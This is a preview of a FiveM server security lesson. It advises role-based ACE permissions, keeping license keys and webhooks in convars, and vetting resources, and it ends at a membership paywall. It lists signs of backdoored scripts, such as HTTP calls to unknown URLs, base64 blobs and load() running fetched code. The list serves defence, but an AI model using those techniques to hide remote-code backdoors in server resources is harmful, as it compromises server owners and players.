Server security baseline
Most beginner servers are not hacked by geniuses. They leak a license key on Discord, give every staffer god-mode, run a random script with a backdoor, or post their database webhook in a public channel. This is the baseline that closes those doors. Treat it as a checklist you run before you ever go public, and again after any big change.
The baseline
Give permissions by role, not by person
Use ACE permissions and groups so you can add or remove a staffer in one line. Grant the narrowest power that does the job; only owners get command.* style access.
add_ace group.admin command allow
add_principal identifier.fivem:00000 group.admin
In txAdmin, give moderators a limited role, not full admin. Review the admin list monthly and remove anyone who left.
Keep secrets out of the repo and out of chat
License key, database password, and Discord webhooks are secrets. Read them at runtime with convars in server.cfg (which is not in your public repo) and never paste them in Discord, screenshots, or videos. If one leaks, rotate it the same hour.
Trust only resources you can read or vouch for
Every resource you ensure runs with full server power. Install from the official author only. Skim server-side files for suspicious PerformHttpRequest calls to unknown URLs, base64 blobs, or load()/assert(load(...)) running fetched code. If you cannot read it and cannot trust the source, do not run it.
Lock down webhooks and logging
Store webhook URLs in convars, send them only from the server side, and never expose them to clients. Anyone with the URL can post to that channel, so treat it like a password.
Keep reading the full lesson
Sign in to start, then unlock every step of this lesson and the full FiveM School with a membership.
- How the ACE example works
- Common mistakes
- What you can do now
- Prove it on your own server
The remainder of Server security baseline is available to FiveM School members.